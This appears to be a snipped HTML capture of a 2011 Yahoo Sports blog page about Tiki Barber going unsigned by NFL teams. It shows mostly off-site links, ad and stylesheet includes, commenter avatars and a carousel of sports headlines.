<link type='text/css' rel='stylesheet' href='http://l.yimg.com/zz/combo?kx/ucs/uh/css/215/yunivhead-min.css&kx/ucs/uh/css/221/logo-min.css&kx/ucs/search/css/180/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css'/><style>
...[SNIP]...
</script><script id="load_wrapper" type="text/javascript" src="http://mi.adinterax.com/wrapper.js"></script>
...[SNIP]...
<!--Vendor: Factor TG, Format: Pixel, IO: 774106--><SCRIPT LANGUAGE="JavaScript" SRC="http://as1.suitesmart.com/99917/G15493.js?GID=15493"></SCRIPT>
...[SNIP]...
<a href="/nfl/blog/shutdown_corner" title="Shutdown Corner - NFL "><img src="http://l.yimg.com/a/i/us/sp/fn/ed/blog/rev/blogheader_shutdowncorner.jpg" alt="Shutdown Corner - NFL "></a>
...[SNIP]...
<p><img src="http://l.yimg.com/a/p/sp/editorial_image/ad/ad9eec7900e325e007145dabe8abc77a/tiki_barber_remains_unemployed_and_sad.jpg" width="270" /="/" align="right" src="http://mit.zenfs.com/209/2011/09/TikiBag.jpg" height="405" hspace="8" class="alignright size-full wp-image-6444" title="TikiBag" alt="Tiki Barber remains unemployed and sad">When Tiki Barber told HBO that <a href="http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-8217-s-return-to-football-is-a-trea?urn=nfl-wp2735">
...[SNIP]...
<p>Now that NFL rosters are set at 53, and Tiki Barber never got to sniff one, I hope that's not true. <a href="http://sportsillustrated.cnn.com/2011/writers/peter_king/09/05/laborday/1.html">According to Peter King at Sports Illustrated, Tiki isn't taking it well</a>
...[SNIP]...
<p>Where this will leave Tiki Barber the person, I don't know. He's also <a href="http://www.huffingtonpost.com/2011/08/30/tiki-barber-traci-lynn-johnson-engaged_n_942415.html">recently proposed to his girlfriend</a>
...[SNIP]...
="http://us.lrd.yahoo.com/_ylc=X3oDMTF0YjliOWY5BHRtX2RtZWNoA1RleHQgTGluawR0bV9sbmsDVTExNzE1MTUEdG1fbmV0A1lhaG9vBHRtX3BvcwNjZW50ZXI-/SIG=11mhsvns4/**http%3A//football.fantasysports.yahoo.com/f1/signup"><img src="http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1314989147.jpg" border="0" alt=""/></a>
...[SNIP]...
<br />
... <a href="http://yhoo.it/nxJyoy">Colts delay Jim Tressel's employment</a><br />
... <a href="http://yhoo.it/phyJNx">Video: The NFL's most critical offseason moves</a><br />
... <a href="http://yhoo.it/mSN2e5">High school wrestler's 9/11 tie to President Bush</a>
...[SNIP]...
<!--{ULT:BEGIN-SECTION;sec=foot-digg}-->
<a href="http://digg.com/submit?phase=2&url=http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2FTiki-Barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443&title=Tiki+Barber+remains+unemployed+and+sad&ts=1315312930" class="digg" title="Digg.com" target="_new"><strong>
...[SNIP]...
<!--{ULT:BEGIN-SECTION;sec=foot-facebook}-->
<a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2FTiki-Barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443&title=Tiki+Barber+remains+unemployed+and+sad&ts=1315312930" class="facebook" title="Facebook" target="_new"><strong>
...[SNIP]...
<!--{ULT:BEGIN-SECTION;sec=foot-twitter}-->
<a href="http://twitter.com/home?status=http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2FTiki-Barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443" class="twitter" title="Twitter" target="_new"><strong>
...[SNIP]...
85/L=FZWRgGKIPE7pARpjTl.wjQCLMhd7ak5mFb0ACDiN/B=3EyaQmKJiSo-/J=1315313085685551/K=TVKeZm0ugXKNYFYgkLGeew/A=6418146/R=0/SIG=11j13n4o5/*http://football.fantasysports.yahoo.com/f1/signup" target="_blank"><img src="http://ads.yimg.com/a/a/ya/yahoo_sports8/yahoo!_fantasy_football11_smb_630x31.jpg" alt="click here" width="630" height="31" border="0"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_OA3RIOXRBGNLY2AQTW2YKVOOLI">

<img id="com_14641504_OA3RIOXRBGNLY2AQTW2YKVOOLI" class="imageloader_classname" width="48" height="48" alt="whitey" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48a.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_ZGAAUPA4UQ74QYKQM4FCHVUJ2Q">

<img id="com_14641496_ZGAAUPA4UQ74QYKQM4FCHVUJ2Q" class="imageloader_classname" width="48" height="48" alt="mcman44" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_FTLQMXZ2XX7F44ZPMMQOHWWURA">

<img id="com_14641490_FTLQMXZ2XX7F44ZPMMQOHWWURA" class="imageloader_classname" width="48" height="48" alt="JOEK" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48e.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_3XCD7V2IBRT43HCIJKHNWX4SZI">

<img id="com_14641475_3XCD7V2IBRT43HCIJKHNWX4SZI" class="imageloader_classname" width="48" height="48" alt="concerned citizen" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_LIMI7M6SXLQ42FGCL5XIGPOHOI">

<img id="com_14641471_LIMI7M6SXLQ42FGCL5XIGPOHOI" class="imageloader_classname" width="48" height="48" alt="Shelby" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_33CGMYSFB4K5BQKR3QB23X7DSI">

<img id="com_14641464_33CGMYSFB4K5BQKR3QB23X7DSI" class="imageloader_classname" width="48" height="48" alt="Bruce" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_IZRO2VV6RFWS7INK2VIVWBS46M">

<img id="com_14641463_IZRO2VV6RFWS7INK2VIVWBS46M" class="imageloader_classname" width="48" height="48" alt="thatgirl" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/1AxKBKy6NAAEB-IFDFFA=.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_2DW3OMNCFZWIQQDTZ6AXB7AYWM">

<img id="com_14641458_2DW3OMNCFZWIQQDTZ6AXB7AYWM" class="imageloader_classname" width="48" height="48" alt="DICKENS" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_IZRO2VV6RFWS7INK2VIVWBS46M">

<img id="com_14641450_IZRO2VV6RFWS7INK2VIVWBS46M" class="imageloader_classname" width="48" height="48" alt="thatgirl" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/1AxKBKy6NAAEB-IFDFFA=.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_VICKDI7FNMKYQ3QZZBP6HK6XTA">

<img id="com_14641448_VICKDI7FNMKYQ3QZZBP6HK6XTA" class="imageloader_classname" width="48" height="48" alt="Felix" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/49bb55e9i2197z/oRJR4kQ3c6RdFBJIcqizfmISUPs-/100/tn48.jpg?ciAa60QBO4C663dh);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_OLUNPBS7ETLZEMC4POMRFP2PPY">

<img id="com_14641444_OLUNPBS7ETLZEMC4POMRFP2PPY" class="imageloader_classname" width="48" height="48" alt="Dan Kraybill" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4c863964i912zul1re3/P6o2Zjs1eqiIcvvUrj0pF4b9HA--/2/tn48.jpg?ciAa60QBqrxsP3u8);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_6BDMBV63PK4OVIMAUYEQBEKQQI">

<img id="com_14641443_6BDMBV63PK4OVIMAUYEQBEKQQI" class="imageloader_classname" width="48" height="48" alt="RollOn2012ObamasOut" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_YVZTVM2UTKHMMSVGWCFFKYJOMQ">

<img id="com_14641428_YVZTVM2UTKHMMSVGWCFFKYJOMQ" class="imageloader_classname" width="48" height="48" alt="Randy" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4d0bb75fi42dzws105mud/wPKJsyAzbqB_yRiR0Oierg--/1/tn48.jpeg?ciAa60QBss8CKkPn);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_LBQQJENEWI7EGQJ7YZIEWFK34Y">

<img id="com_14641413_LBQQJENEWI7EGQJ7YZIEWFK34Y" class="imageloader_classname" width="48" height="48" alt="Russ" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_YKANDFIPI6ZJ3BHNKN4X4UV7GA">

<img id="com_14641407_YKANDFIPI6ZJ3BHNKN4X4UV7GA" class="imageloader_classname" width="48" height="48" alt="Bert" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/49bb6918if4az/bU1fIok3frQKtlLeu_Pmyw--/101/tn48.jpg?ciAa60QBeXVYnGD5);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_VNOFMKX3YQX6UWKYUQNH7Q2A3Y">

<img id="com_14641400_VNOFMKX3YQX6UWKYUQNH7Q2A3Y" class="imageloader_classname" width="48" height="48" alt="NeilD" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_6UTWJJBRCWSD6L2GW6LKQBVCLU">

<img id="com_14641399_6UTWJJBRCWSD6L2GW6LKQBVCLU" class="imageloader_classname" width="48" height="48" alt="Bud" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48a.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_VKH2NYGWOZAEWZRDXNTRU2NROE">

<img id="com_14641393_VKH2NYGWOZAEWZRDXNTRU2NROE" class="imageloader_classname" width="48" height="48" alt="Cherry Bear" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/13IW8dv7DAAECPiE_cIpQBl8B.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_CYAD7NHXP5RNOOAOUVF3W7YARY">

<img id="com_14641378_CYAD7NHXP5RNOOAOUVF3W7YARY" class="imageloader_classname" width="48" height="48" alt="Starcaster" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/1jKNS1qBGAAECkcmcLb7TCA==.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_BKMWFVLSFHWQPIAR2WS7ZQVOV4">

<img id="com_14641370_BKMWFVLSFHWQPIAR2WS7ZQVOV4" class="imageloader_classname" width="48" height="48" alt="Greg" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/1_z0fe50oAAEC2eT6KCAuBA==.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_ZR75SZTAKTX7ICZVKNZ6ZPCHPQ">

<img id="com_14641369_ZR75SZTAKTX7ICZVKNZ6ZPCHPQ" class="imageloader_classname" width="48" height="48" alt="Mr Zox" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48c.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_G2LWBYJFFIRFHKYTHNXS4QEJKY">

<img id="com_14641366_G2LWBYJFFIRFHKYTHNXS4QEJKY" class="imageloader_classname" width="48" height="48" alt="" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4c8ad496idb7zul2re3/cqg5RoE8erDAhvZCVf73KhhwEqQ-/9/tn48.jpg?ciAa60QB0X1WZnq0);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_TRZACYYXQX5Y2O24PMFQZ4YJEQ">

<img id="com_14641363_TRZACYYXQX5Y2O24PMFQZ4YJEQ" class="imageloader_classname" width="48" height="48" alt="Victor" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48c.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_KFR7CSJMD23L6SUBPBABCEZLUU">

<img id="com_14641362_KFR7CSJMD23L6SUBPBABCEZLUU" class="imageloader_classname" width="48" height="48" alt="Dave" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4cc87ca7i1b79zws133ac4/Tn_rkFo1erBUVIO0bdyNXIK0spwP/1/tn48.jpeg?ciAa60QBKdrswYJk);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_7CJUUBMQFZ3O6MCEHGOEKQLT5I">

<img id="com_14641361_7CJUUBMQFZ3O6MCEHGOEKQLT5I" class="imageloader_classname" width="48" height="48" alt="Of the domain of the only known" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48c.png);"></a>
...[SNIP]...
"http://sports.yahoo.com/nfl/news?slug=jc-cole_peyton_manning_colts_lockout090511&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Troubling health news for Peyton Manning">
<img src="http://l.yimg.com/iu/api/res/1.2/Dx8ad3BF8vfI6ktnGQZ2Pw--/YXBwaWQ9eXZpZGVvO2NoPTEyMDtjcj0xO2N3PTE4MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1315252981.jpg" title="Troubling health news for Peyton Manning" alt="Troubling health news for Peyton Manning" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-buddyryan-cancer&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Cancer won't stop Ryan">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
.com/nfl/blog/shutdown_corner/post/Shanahan-names-Rex-Grossman-Redskins-8217-Week?urn=nfl-wp6463&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Redskins name starting QB">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
oo.com/nfl/blog/shutdown_corner/post/Aaron-Rodgers-8217-handlebar-mustache-gives-hi?urn=nfl-wp6423&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="QB's impressive 'stache">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/big_league_stew/post/Jerome-Williams-The-Giants-called-me-8216-Jer?urn=mlb-wp18625&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="MLB player called wrong name for years">
<img src="http://l.yimg.com/iu/api/res/1.2/bL85hQglN3ttKnNb7aMbGA--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/williams-pd.jpg" title="MLB player called wrong name for years" alt="MLB player called wrong name for years" width="94" height="63">
</a>
...[SNIP]...
.com/mlb/blog/big_league_stew/post/Blue-Jays-scout-Japan-8217-s-Yu-Darvish-Is-he-?urn=mlb-wp18464&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Japanese pitching phenom">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mlb/news?slug=jp-passan_10_degrees_mvp_candidates_090411&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Comparing potential MVPs">
<img src="http://l.yimg.com/iu/api/res/1.2/.VekwHIL.XxGYmrIR79ckQ--/YXBwaWQ9eXZpZGVvO2NoPTE2MDtjcj0xO2N3PTI0MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1315203022.jpg" title="Comparing potential MVPs" alt="Comparing potential MVPs" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-colts-manning&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Tough news for Peyton">
<img src="http://l.yimg.com/iu/api/res/1.2/4gYbQm9TOj0foLKTK6kJxw--/YXBwaWQ9eXZpZGVvO2NoPTE0Nztjcj0xO2N3PTIyMDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/08/ipt/1314681169.jpg" title="Tough news for Peyton" alt="Tough news for Peyton" width="94" height="63">
</a>
...[SNIP]...
utdown_corner/post/Colts-delay-Tressel-8217-s-employment-until-sev?urn=nfl-wp6446&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Jim Tressel punished by his new NFL boss">
<img src="http://l.yimg.com/iu/api/res/1.2/tcsbrnHu2XoIp0S0.Ckzsw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/tressel-pd.jpg" title="Jim Tressel punished by his new NFL boss" alt="Jim Tressel punished by his new NFL boss" width="94" height="63">
</a>
...[SNIP]...
ahoo.com/mlb/blog/big_league_stew/post/Pitcher-Milone-hits-home-run-on-first-pitch-he-s?urn=mlb-wp18507&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Rookie's rare feat">
<img src="http://l.yimg.com/iu/api/res/1.2/jpYINf57Jv1vBnQgFernXw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/troop-pd.jpg" title="Rookie's rare feat" alt="Rookie's rare feat" width="94" height="63">
</a>
...[SNIP]...
o.com/mlb/blog/big_league_stew/post/Umpire-West-goes-rogue-on-replay-in-Phillies-Mar?urn=mlb-wp18578&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Umpire's strange call">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
.com/mlb/blog/big_league_stew/post/Brewers-backup-catcher-George-Kottaras-hits-firs?urn=mlb-wp18532&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Catcher hits for cycle">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nascar/news?slug=ap-nascar-atlanta&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="NASCAR hopes bad weather gone by Tuesday">
<img src="http://l.yimg.com/iu/api/res/1.2/fY0ArNmEgARdXgW3VFOLkw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/crash1.jpg" title="NASCAR hopes bad weather gone by Tuesday" alt="NASCAR hopes bad weather gone by Tuesday" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nascar/news?slug=txnascarnationwide&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Edwards recovers, wins">
<img src="http://l.yimg.com/iu/api/res/1.2/KLKYfKOxh3ZdcnMCT15hfw--/YXBwaWQ9eXZpZGVvO2NoPTQyNTtjcj0xO2N3PTYzNDtkeD0xNDtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://d.yimg.com/a/p/sp/getty/b1/fullj.74236e574d6a4f7fa42887a424e4ecaf/74236e574d6a4f7fa42887a424e4ecaf-getty-107745401js007_11th_annual_.jpg" title="Edwards recovers, wins" alt="Edwards recovers, wins" width="94" height="63">
</a>
...[SNIP]...
post/Rafael-Nadal-collapses-at-post-match-press-confe?urn=ten-wp2948&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Rafael Nadal collapses at post-match press conference">
<img src="http://l.yimg.com/iu/api/res/1.2/p8QNXBH2ur9RxK3SSsdbug--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/nadal.jpg" title="Rafael Nadal collapses at post-match press conference" alt="Rafael Nadal collapses at post-match press conference" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/ten/news?slug=afp-tennis_usa_open_venuswilliams_20110904&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Venus thanks fans">
<img src="http://l.yimg.com/iu/api/res/1.2/SGDXAA_VYFh5N_Ix_DfK.g--/YXBwaWQ9eXZpZGVvO2NoPTE2NDtjcj0xO2N3PTI0NTtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ac/cf/fullj.e6fc1b4cfaefc628237dd6812cc3d4a6/0.jpg" title="Venus thanks fans" alt="Venus thanks fans" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/ten/news?slug=afp-tennis_usa_open_men_20110904&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Nadal in field of 16">
<img src="http://l.yimg.com/iu/api/res/1.2/rk8mzTCWVKirKboIUyXTDg--/YXBwaWQ9eXZpZGVvO2NoPTE2NDtjcj0xO2N3PTI0NTtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ac/cf/fullj.d830959be5676770fcf36656ad0b01f5/0.jpg" title="Nadal in field of 16" alt="Nadal in field of 16" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/ten/news?slug=ap-usopen-roddick&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Roddick looks strong">
<img src="http://l.yimg.com/iu/api/res/1.2/hTuM.plFCT5s1M65gp6zww--/YXBwaWQ9eXZpZGVvO2NoPTE0Nztjcj0xO2N3PTIyMDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/08/ipt/1314857213.jpg" title="Roddick looks strong" alt="Roddick looks strong" width="94" height="63">
</a>
...[SNIP]...
log/shutdown_corner/post/Former-Pats-safety-Brandon-Meriweather-leads-lis?urn=nfl-wp6406&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Prominent NFL players on the move">
<img src="http://l.yimg.com/iu/api/res/1.2/PXuMXOwJ2uaXo5fYsMtxbQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/cuts.jpg" title="Prominent NFL players on the move" alt="Prominent NFL players on the move" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=pfw-20110904_nfc_free_agent_moves_by_team_2&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Free agent moves">
<img src="http://l.yimg.com/iu/api/res/1.2/DO19w.oidtwvdIr1uvR..w--/YXBwaWQ9eXZpZGVvO2NoPTIzMDtjcj0xO2N3PTM0MztkeD0zOTtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://d.yimg.com/a/p/sp/pfw/72/fullj.d31be56e39031f27aa6903d7c8ccdb0b/20110904_nfc_free_agent_moves_0.jpg" title="Free agent moves" alt="Free agent moves" width="94" height="63">
</a>
...[SNIP]...
ttp://sports.yahoo.com/nfl/news?slug=nfp-20110904_mark_herzlich_beats_the_odds_makes_giants_roster&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Herzlich beats the odds">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-leeroyselmon&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Selmon is improving">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/top/news?slug=ap-worlds-semenya&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="South African runner's valiant return">
<img src="http://l.yimg.com/iu/api/res/1.2/1J1FJn2FsGUNJqTveVRpJQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/semenya.jpg" title="South African runner's valiant return" alt="South African runner's valiant return" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/top/news?slug=ap-worlds&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Bolt, Jamaica take gold">
<img src="http://l.yimg.com/iu/api/res/1.2/97klez0UFQMbKD7UV7d0.Q--/YXBwaWQ9eXZpZGVvO2NoPTI5NDtjcj0xO2N3PTQ0MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ap/e5/fullj.7d1639ed4877ae02a0cee5b1991a05fe/ap-201109020839311726658.jpg" title="Bolt, Jamaica take gold" alt="Bolt, Jamaica take gold" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/olympics/news?slug=ap-2020bids&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Six bid for 2020 Olympics">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/top/news?slug=reu-worldmentriple_jump_pix&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="American pulls upset">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/blog/big_league_stew/post/Wedgie-Foul-ball-sticks-in-mask-of-Mariners-cat?urn=mlb-wp18471&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Foul ball's funny landing place">
<img src="http://l.yimg.com/iu/api/res/1.2/L_C_0HS.bC_7fqRT3udDuw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/stuck.jpg" title="Foul ball's funny landing place" alt="Foul ball's funny landing place" width="94" height="63">
</a>
...[SNIP]...
ost/32-keys-to-the-NFL-8217-s-2011-season-Part-II-?urn=nfl-wp6499&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="32 keys to the NFL...s 2011 season (Part II)">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/post/32-keys-to-the-NFL-8217-s-2011-season-Part-I-?urn=nfl-wp6496&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="32 keys to the NFL...s 2011 season (Part I)">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
